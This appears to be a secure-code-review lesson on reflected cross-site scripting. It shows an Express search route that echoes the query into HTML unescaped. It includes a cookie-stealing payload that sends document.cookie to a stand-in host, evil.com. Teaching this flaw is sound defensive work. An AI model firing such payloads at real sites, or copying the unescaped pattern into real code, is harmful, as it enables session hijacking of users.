/Code Review/Reflected XSS in Search

Reflected XSS in Search

User input is reflected back in the page without proper sanitization, allowing script injection.

HIGHEasy

Vulnerable Codejavascript

1app.get('/search', (req, res) => {
2    const query = req.query.q;
3    
4    res.send(`
5        <html>
6            <body>
7                <h1>Search Results</h1>
8                <p>You searched for: ${query}</p>
9                <div id="results"></div>
10            </body>
11        </html>
12    `);
13});

Understanding the Issue

The search query is directly embedded into the HTML response without sanitization. An attacker can craft a URL like `/search?q=<script>alert("XSS")</script>` to execute arbitrary JavaScript in the victim's browser.

Script Injection via URL

Attacker crafts a malicious URL and tricks victim into clicking it

Malicious Input

/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>

Impact

The page renders:
<p>You searched for: <script>document.location='https://evil.com/steal?c='+document.cookie</script></p>

✓ Script executes in victim's browser
✓ Cookies (including session) sent to attacker
✓ Attacker can hijack user session

Technical Details

Vulnerability Type: Cross-Site Scripting (XSS)
Severity: HIGH
Language: Javascript
CWE: CWE-79
OWASP: A03:2021 - Injection

Reflected XSS in Search

Understanding the Issue

How Attackers Exploit This

Script Injection via URL

Finding the Vulnerability(3 hints)

Technical Details

Reflected XSS in Search

Understanding the Issue

How Attackers Exploit This

Script Injection via URL

Finding the Vulnerability(3 hints)

Technical Details